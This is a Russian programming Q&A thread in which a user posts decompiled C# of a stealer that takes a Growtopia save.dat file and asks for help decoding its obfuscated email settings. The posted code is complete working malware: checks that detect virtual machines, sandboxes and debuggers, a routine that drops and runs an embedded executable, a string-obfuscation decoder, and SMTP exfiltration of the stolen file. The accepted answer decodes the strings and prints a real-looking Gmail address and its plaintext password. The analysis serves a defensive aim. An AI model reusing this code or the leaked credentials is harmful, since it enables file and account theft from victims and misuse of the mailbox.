# Помогите расшифровать часть кода вируса

Tags: c#

Есть вирус:

```
namespace sm1439
{
    // Token: 0x02000002 RID: 2
    internal class autism1089
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        [STAThread]
        private static void Main()
        {
            autism1089.ama173();
        }

        // Token: 0x06000002 RID: 2
        [DllImport("kernel32.dll")]
        public static extern IntPtr GetModuleHandle(string lpModuleName);

        // Token: 0x06000003 RID: 3
        [DllImport("kernel32.dll")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);

        // Token: 0x06000004 RID: 4
        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public static extern uint GetFileAttributes(string lpFileName);

        // Token: 0x06000005 RID: 5 RVA: 0x000027C4 File Offset: 0x000009C4
        public static async void hax3465()
        {
            await Task.Delay(0);
            try
            {
                if (autism1089.hax7886("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("SOFTWARE\\Oracle\\VirtualBox Guest Additions", "") == "noValueButYesKey")
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys") != 4294967295u)
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("SOFTWARE\\VMware, Inc.\\VMware Tools", "") == "noValueButYesKey")
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmmouse.sys") != 4294967295u)
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys") != 4294967295u)
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.GetProcAddress(autism1089.GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0)
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("XEN"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VIRTUALBOX"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VIRTUAL"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VMWARE"))
                {
                    autism1089.sm2729 = true;
                }
                else if (autism1089.hax7886("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("HYPERVISOR"))
                {
                    autism1089.sm2729 = true;
                }
                else
                {
                    ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2");
                    ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_VideoController");
                    ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(scope, query);
                    ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get();
                    foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
                    {
                        ManagementObject managementObject = (ManagementObject)managementBaseObject;
                        if (managementObject["Description"].ToString().ToUpper().Contains("S3 TRIO"))
                        {
                            autism1089.sm2729 = true;
                            return;
                        }
                        if (managementObject["Description"].ToString().ToUpper().Contains("VBOX") || managementObject["Description"].ToString().ToUpper().Contains("VIRTUALBOX"))
                        {
                            autism1089.sm2729 = true;
                            return;
                        }
                        if (managementObject["Description"].ToString().ToUpper().Contains("VMWARE"))
                        {
                            autism1089.sm2729 = true;
                            return;
                        }
                        if (managementObject["Description"].ToString().ToUpper().Contains("XEN"))
                        {
                            autism1089.sm2729 = true;
                            return;
                        }
                        if (managementObject["Description"].ToString().ToUpper().Contains("HYPERVISOR"))
                        {
                            autism1089.sm2729 = true;
                            return;
                        }
                        if (managementObject["Description"].ToString() == "")
                        {
                            autism1089.sm2729 = true;
                            return;
                        }
                    }
                    autism1089.sm2729 = false;
                }
            }
            catch (Exception ex)
            {
                autism1089.sm2729 = true;
            }
        }

        // Token: 0x06000006 RID: 6 RVA: 0x000027F8 File Offset: 0x000009F8
        public static string hax7886(string sm3506, string autism8042)
        {
            RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(sm3506, false);
            string result;
            if (registryKey != null)
            {
                object value = registryKey.GetValue(autism8042, "noValueButYesKey");
                if (value.GetType() == typeof(string))
                {
                    result = value.ToString();
                }
                else if (registryKey.GetValueKind(autism8042) == RegistryValueKind.String || registryKey.GetValueKind(autism8042) == RegistryValueKind.ExpandString)
                {
                    result = value.ToString();
                }
                else if (registryKey.GetValueKind(autism8042) == RegistryValueKind.DWord)
                {
                    result = Convert.ToString((int)value);
                }
                else if (registryKey.GetValueKind(autism8042) == RegistryValueKind.QWord)
                {
                    result = Convert.ToString((long)value);
                }
                else if (registryKey.GetValueKind(autism8042) == RegistryValueKind.Binary)
                {
                    result = Convert.ToString((byte[])value);
                }
                else if (registryKey.GetValueKind(autism8042) == RegistryValueKind.MultiString)
                {
                    result = string.Join("", (string[])value);
                }
                else
                {
                    result = "noValueButYesKey";
                }
            }
            else
            {
                result = "noKey";
            }
            return result;
        }

        // Token: 0x06000007 RID: 7
        [DllImport("advapi32.dll", SetLastError = true)]
        public static extern bool GetUserName(StringBuilder sb, ref int length);

        // Token: 0x06000008 RID: 8
        [DllImport("user32.dll", SetLastError = true)]
        private static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly);

        // Token: 0x06000009 RID: 9 RVA: 0x00002BB0 File Offset: 0x00000DB0
        public static async void ama7697()
        {
            try
            {
                StringBuilder stringBuilder = new StringBuilder();
                int num = 50;
                Process[] processes = Process.GetProcesses();
                string text = autism1089.ama4058.ToUpper();
                autism1089.GetUserName(stringBuilder, ref num);
                if ((int)autism1089.GetModuleHandle("SbieDLL.dll") != 0)
                {
                    autism1089.autism5580 = true;
                }
                else if (stringBuilder.ToString().ToUpper().Contains("VIRUS") || stringBuilder.ToString().ToUpper().Contains("SCHMIDTI") || stringBuilder.ToString().ToUpper().Contains("MALWARE") || stringBuilder.ToString().ToUpper().Contains("SANDBOX") || stringBuilder.ToString().ToUpper() == "CURRENTUSER" || stringBuilder.ToString().ToUpper() == "USER")
                {
                    autism1089.autism5580 = true;
                }
                else
                {
                    foreach (Process process in processes)
                    {
                        if (process.ProcessName.ToUpper().Contains("SANDBOXIE"))
                        {
                            autism1089.autism5580 = true;
                            return;
                        }
                    }
                    if (text.Contains("C:\\FILE.EXE") || text.Contains("\\VIRUS") || text.Contains("SANDBOX") || text.Contains("SAMPLE") || text.Contains("MALWARE") || text.Contains("DE4DOT") || text.Contains("REVERSE"))
                    {
                        autism1089.autism5580 = true;
                    }
                    else if ((int)autism1089.FindWindow("Afx:400000:0", (IntPtr)0) != 0)
                    {
                        autism1089.autism5580 = true;
                    }
                    else
                    {
                        autism1089.autism5580 = false;
                    }
                }
            }
            catch (Exception ex)
            {
                autism1089.autism5580 = true;
            }
        }

        // Token: 0x0600000A RID: 10 RVA: 0x00002D94 File Offset: 0x00000F94
        private static async void hax2775()
        {
            await Task.Delay(0);
            try
            {
                using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream("AutoBuilder.exe"))
                {
                    byte[] array = new byte[manifestResourceStream.Length];
                    manifestResourceStream.Read(array, 0, array.Length);
                    File.WriteAllBytes(Path.GetTempPath() + "AutoBuilder.exe", array);
                    Process.Start(Path.GetTempPath() + "AutoBuilder.exe");
                }
            }
            catch (Exception ex)
            {
            }
        }

        // Token: 0x0600000B RID: 11 RVA: 0x00002EC8 File Offset: 0x000010C8
        private static async void leet6302()
        {
            await Task.Delay(0);
            if (Debugger.IsAttached || Debugger.IsLogging())
            {
                Environment.Exit(0);
            }
        }

        // Token: 0x0600000C RID: 12 RVA: 0x00002EFC File Offset: 0x000010FC
        public static string c(string text)
        {
            string result;
            try
            {
                byte[] array = Convert.FromBase64String(text);
                byte[] array2 = new byte[array.Length];
                for (int i = 0; i < array.Length; i++)
                {
                    array2[i] = (byte)((char)array[i] ^ "i_7egJJdOOuPoE_w"[i % "i_7egJJdOOuPoE_w".Length]);
                }
                string @string = Encoding.UTF8.GetString(array2);
                result = @string;
            }
            catch (Exception ex)
            {
                result = string.Empty;
            }
            return result;
        }

        // Token: 0x0600000D RID: 13 RVA: 0x00002F80 File Offset: 0x00001180
        public static byte[] G(string x)
        {
            byte[] result;
            try
            {
                List<byte> list = new List<byte>();
                for (int i = 0; i < x.Length; i += 8)
                {
                    string value = x.Substring(i, 8);
                    list.Add(Convert.ToByte(value, 2));
                }
                result = list.ToArray();
            }
            catch (Exception ex)
            {
                List<byte> list2 = new List<byte>();
                result = list2.ToArray();
            }
            return result;
        }

        // Token: 0x0600000E RID: 14 RVA: 0x00002FF8 File Offset: 0x000011F8
        public static string leet3371(string z)
        {
            string result;
            try
            {
                string text = autism1089.c(z);
                z = null;
                text = text.Replace("_", "M");
                text = text.Replace("<", "=");
                text = text.Replace(">", "D");
                text = text.Replace("!", "A");
                byte[] bytes = Convert.FromBase64String(text);
                string text2 = Encoding.ASCII.GetString(bytes);
                text2 = text2.Replace(";", "1");
                byte[] bytes2 = autism1089.G(text2);
                string @string = Encoding.ASCII.GetString(bytes2);
                result = @string;
            }
            catch (Exception ex)
            {
                result = string.Empty;
            }
            return result;
        }

        // Token: 0x0600000F RID: 15 RVA: 0x00003388 File Offset: 0x00001588
        private static async void ama173()
        {
            await Task.Delay(0);
            try
            {
                autism1089.leet6302();
                MessageBox.Show("Error, try again!");
                autism1089.hax2775();
                autism1089.hax3465();
                if (autism1089.sm2729)
                {
                    Environment.Exit(0);
                }
                autism1089.ama4058 = Assembly.GetExecutingAssembly().Location;
                autism1089.ama7697();
                if (autism1089.autism5580)
                {
                    Environment.Exit(0);
                }
                string text = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + autism1089.leet3371("NmFEEigwOVMQcVQnID9+ADZhRFIoMGtTADUGJzB7LAA2YURSOHQ5UwA1BicgPyxANmFEUigwa1MANQYnID9+ADZhRFI4dDlTADUGJyA/LEA2YRYSOHRrUwA1VGcwe35ANmFEUjh0axMQcQYnID9+QCYlRBI4dGtTADUGJzB7LEA2YURSOHRrExBxBicgPyxANmFEUjh0a1MANVQnID9+QDZhFlI4dDlTADVUJyA/LAA2YUQSOHRrUwA1VCcwe35ANmFEUigwa1MQcVRs");
                string text2 = Path.GetTempPath() + autism1089.leet3371("NmFEEigwOVMQcVQnID8sQCYlFlI4dGsTADUGJzB7fkA2YRZSOHQ5UwA1VCcgPyxANmFEEjh0a1MANQZnMHt+ADZhRFIoMGtTEHFUbA==");
                string host = autism1089.leet3371("NmFEUigwaxMANQYnID8sACYlRBIoMGtTADUGJyA/fgA2YURSKDBrExBxVCcweywAJiVEUjh0a1MANVQnID8sQDZhRFI4dDlTEHEGJyA/LAA2YRYSKDBrUwA1VGcwe35ANmFEUjh0OVMQcVQnMHssACYlRFI4dGtTADVUJzB7LEA2YURSOHQ5UwA1BicgPywAJiVEEig9dlg=");
                if (File.Exists(text))
                {
                    File.Copy(text, text2, true);
                    autism1089.leet6302();
                    string text3 = autism1089.leet3371("NmFEUjh0axMQcQYnID8sQDZhRFIoMGtTADUGJyA/LEA2YURSKDA5ExBxBicgPywAJiVEUigwa1MANQYnID9+QDZhRFI4dGtTADUGJyA/LAAmJURSKDBrUwA1BicgP34ANmFEUjh0OVMQcQYnID8sADZhRBIoMGtTEHFUJzB7fgA2YURSOHRrUwA1BicgPywAJiVEEigwa1MANVQnMHt+QDZhRFI4dDkTEHEGJyA/LAAmJUQSOHRrEwA1VGcgPywANmFEUjh0axMANQYnID8sACYlRFIoMGtTADVUZyA/fkA=");
                    string password = autism1089.leet3371("NmFEEjh0OVMANVQnID8sADZhRBIoMGtTADVUJyA/fkA2YURSOHQ5EwA1BicgPywANmFEEigwa1MANQYnMHssADZhRFI4dDkTEHEGJyA/LEA2YUQSOHRrEwA1Bicwe35ANmEWUigwaxMANVQnMHssQDZhFlIoMGsTADVUJzB7fkA=");
                    string to = autism1089.leet3371("NmFEUjh0axMQcQYnID8sQDZhRFIoMGtTADUGJyA/LEA2YURSKDA5ExBxBicgPywAJiVEUigwa1MANQYnID9+QDZhRFI4dGtTADUGJyA/LAAmJURSKDBrUwA1BicgP34ANmFEUjh0OVMQcQYnID8sADZhRBIoMGtTEHFUJzB7fgA2YURSOHRrUwA1BicgPywAJiVEEigwa1MANVQnMHt+QDZhRFI4dDkTEHEGJyA/LAAmJUQSOHRrEwA1VGcgPywANmFEUjh0axMANQYnID8sACYlRFIoMGtTADVUZyA/fkA=");
                    string subject = autism1089.leet3371("NmFEEjh0a1MANVQnID8sQDZhFlI4dGtTADVUZyA/LEA2YURSOHQ5UxBxBicweywANmEWEjh0a1MQcVQnMHt+QDZhRFI4dDlTEHEGJyA/LAA2YRYSKDBrEwA1BicgPywANmEWUigwaxMQcVQnMHssQDZhFhIoMGsTADUGZzB7fgA=");
                    string body = autism1089.leet3371("NmFEEjh0ORMQcVQnID8sADZhFhIoMGtTADUGJyA/LAA2YURSOHRrUxBxBicweywANmEWEjh0a1MANVQnID8sADZhRFIoMGtTEHEGJyA/LAAmJURSOHRrEwA1VCcwe34ANmEWUigwa1MANVQnMHssQDZhFhIoMGsTADUGZzB7fgA2YRZSKDBrUxBxVGw=");
                    autism1089.leet6302();
                    MailMessage mailMessage = new MailMessage(text3, to, subject, body);
                    SmtpClient smtpClient = new SmtpClient(host, 587);
                    smtpClient.EnableSsl = true;
                    smtpClient.Credentials = new NetworkCredential(text3, password);
                    if (text2 != string.Empty || text2 != null)
                    {
                        Attachment item = new Attachment(text2);
                        mailMessage.Attachments.Add(item);
                    }
                    smtpClient.Send(mailMessage);
                    Thread.Sleep(3000);
                    try
                    {
                        smtpClient.Dispose();
                        File.Delete(text2);
                    }
                    catch (Exception ex)
                    {
                    }
                    Environment.Exit(0);
                }
            }
            catch (Exception ex)
            {
            }
        }

        // Token: 0x04000001 RID: 1
        private static bool sm2729 = true;

        // Token: 0x04000002 RID: 2
        private static bool autism5580 = true;

        // Token: 0x04000003 RID: 3
        private static string ama4058 = string.Empty;
    }
}
```

Он крадет один файл и отсылает его на электронную почту, которая сама по себе зашифрована. Я знаю, что он ворует /AppData/Local/Growtopia/save.dat
Помогите расшифровать детали электронной почты.
Файл целиком [здесь](https://www15.zippyshare.com/v/9sko1trU/file.html).
Нормально декомпилируется через DnSpy.
Добавлено: если пробовать открывать через debugger- приложение останавливается

Comment: А можно поинтересоваться, для чего вам это все? Видно, что вы либо не внимательны, либо вовсе не знаете куда лезете. Так зачем? Если бы вы знали как устроен язык C# (да и почти любой), то прошлись бы по методам, которые вызываются и посмотрели как они работают (а они в этом коде есть все)....

Comment: Сменить пароль от почты, что-бы стиллер не работал...

Answer (score 2, accepted):

Напишу этот ответ как то, как можно было бы получить данные из кода, то что отсылается, т.е. все переменные от `text` to `body`

> ```
> text: \Growtopia\save.dat
> text2: \z1.txt
> host: smtp.gmail.com
> text3: awwyougotme@gmail.com
> password: Neekerit123!
> to: awwyougotme@gmail.com
> subject: From Ama6018
> body: Have fun 6184
> ```

Простой код для того что бы узнать что и где, создан на основе кода ТС:

https://ideone.com/MtCrcA

```
public class Test
{
    public static void Main()
    {
        Console.WriteLine($"text: {leet3371("NmFEEigwOVMQcVQnID9+ADZhRFIoMGtTADUGJzB7LAA2YURSOHQ5UwA1BicgPyxANmFEUigwa1MANQYnID9+ADZhRFI4dDlTADUGJyA/LEA2YRYSOHRrUwA1VGcwe35ANmFEUjh0axMQcQYnID9+QCYlRBI4dGtTADUGJzB7LEA2YURSOHRrExBxBicgPyxANmFEUjh0a1MANVQnID9+QDZhFlI4dDlTADVUJyA/LAA2YUQSOHRrUwA1VCcwe35ANmFEUigwa1MQcVRs")}");
        Console.WriteLine($"text2: {leet3371("NmFEEigwOVMQcVQnID8sQCYlFlI4dGsTADUGJzB7fkA2YRZSOHQ5UwA1VCcgPyxANmFEEjh0a1MANQZnMHt+ADZhRFIoMGtTEHFUbA==")}");
        Console.WriteLine($"host: {leet3371("NmFEUigwaxMANQYnID8sACYlRBIoMGtTADUGJyA/fgA2YURSKDBrExBxVCcweywAJiVEUjh0a1MANVQnID8sQDZhRFI4dDlTEHEGJyA/LAA2YRYSKDBrUwA1VGcwe35ANmFEUjh0OVMQcVQnMHssACYlRFI4dGtTADVUJzB7LEA2YURSOHQ5UwA1BicgPywAJiVEEig9dlg=")}");
        Console.WriteLine($"text3: {leet3371("NmFEUjh0axMQcQYnID8sQDZhRFIoMGtTADUGJyA/LEA2YURSKDA5ExBxBicgPywAJiVEUigwa1MANQYnID9+QDZhRFI4dGtTADUGJyA/LAAmJURSKDBrUwA1BicgP34ANmFEUjh0OVMQcQYnID8sADZhRBIoMGtTEHFUJzB7fgA2YURSOHRrUwA1BicgPywAJiVEEigwa1MANVQnMHt+QDZhRFI4dDkTEHEGJyA/LAAmJUQSOHRrEwA1VGcgPywANmFEUjh0axMANQYnID8sACYlRFIoMGtTADVUZyA/fkA=")}");
        Console.WriteLine($"password: {leet3371("NmFEEjh0OVMANVQnID8sADZhRBIoMGtTADVUJyA/fkA2YURSOHQ5EwA1BicgPywANmFEEigwa1MANQYnMHssADZhRFI4dDkTEHEGJyA/LEA2YUQSOHRrEwA1Bicwe35ANmEWUigwaxMANVQnMHssQDZhFlIoMGsTADVUJzB7fkA=")}");
        Console.WriteLine($"to: {leet3371("NmFEUjh0axMQcQYnID8sQDZhRFIoMGtTADUGJyA/LEA2YURSKDA5ExBxBicgPywAJiVEUigwa1MANQYnID9+QDZhRFI4dGtTADUGJyA/LAAmJURSKDBrUwA1BicgP34ANmFEUjh0OVMQcQYnID8sADZhRBIoMGtTEHFUJzB7fgA2YURSOHRrUwA1BicgPywAJiVEEigwa1MANVQnMHt+QDZhRFI4dDkTEHEGJyA/LAAmJUQSOHRrEwA1VGcgPywANmFEUjh0axMANQYnID8sACYlRFIoMGtTADVUZyA/fkA=")}");
        Console.WriteLine($"subject: {leet3371("NmFEEjh0a1MANVQnID8sQDZhFlI4dGtTADVUZyA/LEA2YURSOHQ5UxBxBicweywANmEWEjh0a1MQcVQnMHt+QDZhRFI4dDlTEHEGJyA/LAA2YRYSKDBrEwA1BicgPywANmEWUigwaxMQcVQnMHssQDZhFhIoMGsTADUGZzB7fgA=")}");
        Console.WriteLine($"body: {leet3371("NmFEEjh0ORMQcVQnID8sADZhFhIoMGtTADUGJyA/LAA2YURSOHRrUxBxBicweywANmEWEjh0a1MANVQnID8sADZhRFIoMGtTEHEGJyA/LAAmJURSOHRrEwA1VCcwe34ANmEWUigwa1MANVQnMHssQDZhFhIoMGsTADUGZzB7fgA2YRZSKDBrUxBxVGw=")}");

    }

            // Token: 0x0600000C RID: 12 RVA: 0x00002EFC File Offset: 0x000010FC
        public static string c(string text)
        {
            string result;
            try
            {
                byte[] array = Convert.FromBase64String(text);
                byte[] array2 = new byte[array.Length];
                for (int i = 0; i < array.Length; i++)
                {
                    array2[i] = (byte)((char)array[i] ^ "i_7egJJdOOuPoE_w"[i % "i_7egJJdOOuPoE_w".Length]);
                }
                string @string = Encoding.UTF8.GetString(array2);
                result = @string;
            }
            catch (Exception ex)
            {
                result = string.Empty;
            }
            return result;
        }

        // Token: 0x0600000D RID: 13 RVA: 0x00002F80 File Offset: 0x00001180
        public static byte[] G(string x)
        {
            byte[] result;
            try
            {
                List<byte> list = new List<byte>();
                for (int i = 0; i < x.Length; i += 8)
                {
                    string value = x.Substring(i, 8);
                    list.Add(Convert.ToByte(value, 2));
                }
                result = list.ToArray();
            }
            catch (Exception ex)
            {
                List<byte> list2 = new List<byte>();
                result = list2.ToArray();
            }
            return result;
        }

    public static string leet3371(string z)
        {
            string result;
            try
            {
                string text = c(z);
                z = null;
                text = text.Replace("_", "M");
                text = text.Replace("<", "=");
                text = text.Replace(">", "D");
                text = text.Replace("!", "A");
                byte[] bytes = Convert.FromBase64String(text);
                string text2 = Encoding.ASCII.GetString(bytes);
                text2 = text2.Replace(";", "1");
                byte[] bytes2 = G(text2);
                string @string = Encoding.ASCII.GetString(bytes2);
                result = @string;
            }
            catch (Exception ex)
            {
                result = string.Empty;
            }
            return result;
        }
}
```

Comment: Фи, ящик на гмейле! А пароль-то какой-то сложный... В общем, обычный base64, просто некоторые символы меняются для запутывания.

Comment: @AK: А еще великолепная защита для самого ящика, отсылка писем самому себе :D

Comment: Ага:) Сам поражаюсь, но все равно спасибо:)